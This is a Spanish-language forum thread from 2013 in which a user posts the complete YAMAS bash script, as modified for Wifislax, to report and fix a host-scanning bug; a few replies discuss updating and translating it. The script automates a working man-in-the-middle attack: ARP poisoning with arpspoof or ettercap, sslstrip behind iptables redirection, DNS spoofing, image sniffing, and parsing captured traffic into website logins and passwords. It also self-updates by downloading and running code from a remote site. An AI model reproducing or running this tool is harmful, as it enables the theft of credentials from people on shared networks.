Seguridad Wireless - Wifi
Suite Seguridad Wireless => Colaboracion y desarrollo de nuestras lives => Mensaje iniciado por: vk496 en 28-12-2013, 21:53 (Sábado)
-
Me fijé que cuando elegías un ataque específico escaneando la red en busca de host activos, se ponía a escanear 127.0.0.0/8 (Ya os imaginareis cuanto tardará en escanear todo eso ^-^)
Por eso decidí echar un vistazo (a la vista de Wifislax 4.8 >:D ) y el problema se encontraba en el parseo de datos de la variable $search (concretamente en la linea 397)
Aquí dejo el script:
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net
if [ $UID -ne 0 ]; then
echo -e "\033[31Este programa debe ejecutarse como root.
Si no probablemente fallará.\033[m"
sleep 3
fi
log_output_dir=/root/Driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120827"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C Atrapado. Ejecutando la limpieza y cerrando.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Limpiza efectuada con exito !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No hay entrada de archivo dado. Salir. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Analizando $2 para credenciales.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-pl) while :
do
clear
echo -e "Analizando $2 para credenciales.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
sleep 3
done ;;
-e | --etter) echo -e "\tVa a utilizar Ettercap en lugar de ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "Esta ejecutando $0, version $version.
Uso : $0 -h -c -p -e -s -f
-h o --help : Muestra este mensaje de ayuda, aviso legal y sale.
-c o --change: Muestra changelog.
-e : Utilice ettercap en lugar de ARPspoof. Podriamos tener razones propias ...
Arpspoof es el predeterminado.
-p o --parse : Sólo analizar un determinado <file>. No utilice caracteres comodín.
Utilice> / output_file para imprimir en un archivo.
-s : Modo invisible. El script no se descarga nada.
-f : Utilice padlock favicon en sslstrip.
\033[31m EXENCION DE RESPONSABILIDAD:\033[m
Este programa esta ha sido creado con el unico proposito del aprendizaje.
No justifico la pirateria y no sere responsable de sus acciones.
Puede enfrentarse a consecuencias legales si utiliza este script
para actividades ilegales.
\033[31m Lo que creo que se debe aprender de este script :\033[m
Este script le enseñara lo facil que es obtener credenciales en linea
sensible y como protegerse de ello, a condicion de que entiende
lo que hace el programa. La mejor manera de entender lo que hace es
buscar en su origen. Esto también le ayudara a entendre algunas
secuencias basicas de comandos shell."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to thif [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fie people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "Stealth mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
-t)
time="$4" ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "Las tablas ASCII no estarán disponibles."
echo "Las tablas ASCII no están disponibles debido al uso de modo silencioso." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "No comprobar una nueva versión: modo silencioso."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "Esta corriendo la version \033[31m$version\033[m, quieres actualizar a \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Desea instalarlo de modo que usted puede lanzar con \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuando con la versión actualizada ..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuando con la versión actual ..."
fi
else
echo "Ninguna actualizacion disponible"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script no esta instalado. Desea instalarlo? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, entonces no instalar !"
fi
else
echo "Script instalado"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMensaje del dia :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m
Limpiando iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Limpio."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m
Matar procesos y restablecer iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ "$drifton1" != "" ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
kill $drifton1 #kill the unbeliever
fi
if [[ "$drifton2" != "" ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
kill $drifton2 #kill the unbeliever
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Limpieza con éxito !\033[m"
echo -e "\nDesea guardar el archivo de registro completo para su uso posterior o tenemos que eliminarlo? (Y=guardar)"
echo "(Si desea guardarlo, se almacenara en $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copiado !" #it does
else echo "Error al copiar archivo de registro. Mirar /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs no guardado"
fi
echo -e "\nDesea guardar los Passwords en un archivo? (Y=guardar)"
echo "(Si desea guardarlo, se almacenara en $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords guardados !" #it does
else
echo "Error al copiar archivo de passwords" #it does not
fi
else
echo "Password no guardados."
fi
rm /tmp/$filename.txt
echo -e "\nBorrado de archivos temporales."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "E script no se ha instalado todavia. Desea instalarlo, para que pueda volver a utilizarlo mas tarde tecleando 'yamas' en la consola? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script instalado !\033[m" ;;
*) echo "Script no instalado." ;;
esac
fi
exit 1
}
search=$(ip route show | grep src | awk '{ print $1}') #store gateway/24 for whole network mapping to variable
#Si no se parsea con 'grep src', cogerá la interface 'lo' en vez de la correcta (vk496)
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Introduzca una nueva dirección IP para atacar :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. Terminar con #.
Usage is : 127.0.0.1 foo.bar.com
Puede utilizar comodines."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "Si ya tiene un host file, introduzca el path. Si no es así, pulse enter"
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost se utilizará."
else
echo -e "Vamos a hacer una ...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Te gustaria utilizar Ettercap 'dns_spoof' plugin o dnsspoof (E/D) ? Pulsa a para abortar"
read spoofpgm
case $spoofpgm in
E) echo "Usaremos ettercap. Asegurese de haber editado /etc/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "Usaremos dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Mala eleccion. Elija E ó D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nEstas son las caracteristicas Miscellanous.
1. Image sniffing
2. DNS spoofing
3. Anterior menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "Mala eleccion"
misc ;;
esac
}
image_menu()
{
echo -e "Elegir preferencias para driftnet.
1. Guarda todas las imagenes en $log_output_dir/capture[date]
2. Mostrar imagenes en la pantalla"
read image_choice
case $image_choice in
1) mkdir -p $log_output_dir/capture_$(date +%d%m%y)
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & drifton1=$!
dolphin $log_output_dir/capture_$(date +%d%m%y) &> /dev/null &
echo "Driftnet Lanzado."
misc ;;
2) driftnet -i $iface &> /dev/null & drifton2=$!
echo "Driftnet Lanzado."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nEn este menú, usted puede pausar, reanudar, matar, o poner en marcha
análisis en tiempo real (RTP).
1. Pause RTP (mantener xterm abierta para que usted pueda leer, copypaste, etc)
2. Reanudar RTP.
3. Matar RTP (stop y cierra xterm)
4. Re-lanzar RTP
5. Anterior menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
Pausing...\033[m"
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
Reanudando...\033[m"
kill -18 $looparseid
echo -e "\033[33m[-]Reanudado.\033[m"
rtparse;;
3) echo -e "\033[31m
Matando...\033[m"
kill $looparseid
echo -e "\033[33m[-]Matado.\033[m"
rtparse;;
4) echo -e "\033[32m
Lanzando...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$!
sleep 2
echo -e "\033[33m[-]Lanzado.\033[m"
rtparse;;
5) echo "Anterior"
final ;;
*) echo -e "\033[31mMala eleccion bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack esta corriendo\033[m. Usted Puede :
echo " "
1. Rescan network.
2. Add_Target (nuevo destino, inutil si eligio toda la red).
3. Mostrar tabla de correspondencias ASCII.
4. Real-time analisis...
5. Misc funciones.
6. Quit (Terminar apropiadamente).
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mMala eleccion bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m
Activar el reenvio de IP ... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activado."
#Iptables
echo
echo -e "\033[31m
Configurando iptables... \033[m"
echo -en "\033[31m
\033[m Hacia que puerto debe ser redirigido el trafico? (por defecto = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Puerto $outport seleccionado por defecto.\n"
fi
echo -en "\033[31m
\033[m Desde que puerto debe ser redirigido el trafico? (por defecto = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Puerto $inport seleccionado por defecto.\n"
fi
echo -e "\n\033[33m El trafico del puerto $inport se redirige al puerto $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Trafico desviado"
#Sslstrip
echo
echo -e "\033[31m
Activando sslstrip... \033[m"
echo "Elegir nombre de archivo para la salida: (por defecto = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip escucha en el puerto $outport y se guarda el log en /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip se esta ejecutando." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m
Activando ARP envenenamiento de cache ... \033[m"
echo
ip route show | awk '(NR == 1) { print "puerta de enlace :", $3," ", "interfaz :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Escriba la direccion IP de la puerta de enlace o pulse Intro para utilizar $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway seleccionado por defecto.\n"
fi
echo
echo "Que interfaz le gustaria usar? Debe coincidir con puerta de enlace IP como se muestra arriba. Pulse Intro para usar $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface seleccionado por defecto.\n"
fi
echo -e "\r"
echo -e "Nos concentraremos en toda la red de forma predeterminada. Usted puede \033[4md\033[mDescubrir hosts e introducir IP(s) de forma manual \033[4mD\033[m.
Pulsa INTRO para elegir por defecto."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nUsted desea asignar la red para mostrar live hosts? (Y/N) [Esto puede tardar hasta 30 segundos, sea paciente]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Por favor, introduzca los objetivos segun utilizacion : IP1 IP2 IP3...
\033[31m Cuidado! Esto se generan tantas ventanas como blancos de entrada y podría ralentizar actuaciones. Si ese fuera el caso, a continuacion, utilizar la orientación de toda la red.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Orientación $parameters en $gateway en $iface con ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "envenenamiento $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Orientación $parameters en $gateway en $iface con Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Orientación de toda la red en $gateway en $iface con Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Orientacion de toda la red en $gateway en $iface con ARPspoof\033[m"
fi
fi
echo -e "[-] Arp envenenamiento de cache se puso en marcha. \033[31m Mantenga ventana(s) nueva(s) que se ejecuta. \033[m"
echo -e "\n\033[32m Ataque debe estar funcionando sin problemas, Disfrute.\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
A vosotros tambien os pasa eso?
Salu2
-
Hay una actualizacion de yamas en su pagina , pero por ¿ pereza ?
esta sin actualizar , tal vez eso venga reparado ..
si te animas ....
yo lo baje un par de veces y estube probando y parecia funcionar todo a la primera.
creo que yamas nos dejo traumatizados, por que la primera version hbo que retocar mucho codigo para que funcionase en wifislax, y desde hay que nadie quiere ya actualizarlo.
como digo a mi me parecio que funcionaba sin problemas la version nueva, pero no lo probe muy a fondo , por eso no lo actualice , me parecio demasiado facil y no me fie ...me refieor al hecho de que me resulata raro que de repente sea 100% compatible cuando la versio anterior le tubimos que dar mucha cera.
-
Hay una actualizacion de yamas en su pagina , pero por ¿ pereza ?
esta sin actualizar , tal vez eso venga reparado ..
si te animas ....
yo lo baje un par de veces y estube probando y parecia funcionar todo a la primera.
creo que yamas nos dejo traumatizados, por que la primera version hbo que retocar mucho codigo para que funcionase en wifislax, y desde hay que nadie quiere ya actualizarlo.
como digo a mi me parecio que funcionaba sin problemas la version nueva, pero no lo probe muy a fondo , por eso no lo actualice , me parecio demasiado facil y no me fie ...me refieor al hecho de que me resulata raro que de repente sea 100% compatible cuando la versio anterior le tubimos que dar mucha cera.
Mañana me pongo a traducir el script y hago un nuevo hilo...
Si quieres borra este hilo
Salu2
Solo sé que no sé nada...
-
ojo , que son mas de las 12 y ya no es dia 28 , asi que como broma no cuela. ;D
ahora tendras que bajarlo , y traducirlo .... ;D
puedes abrir un hilo nuevo ya que sera un tema nuevo
"test ultimo yamas" ;D
-
y no cites, si no hay respuestas nuevas. que pajes nuevo coño
-
y no cites, si no hay respuestas nuevas. que pajes nuevo coño
Siempre lo hago para poder dirigirme a alguien... acaso hago algo mal? (Solo pregunto eh ;) )
Solo sé que no sé nada...
-
ojo , que son mas de las 12 y ya no es dia 28 , asi que como broma no cuela. ;D
ahora tendras que bajarlo , y traducirlo .... ;D
Ignoro las consecuencias de lo que acabo de decir y deduzco que lo voy a lamentar... jajajajaja
Salu2
Solo sé que no sé nada...
-
por lo de traducirlo , ... por lo demas si funciona tal cual viene pues menos faena.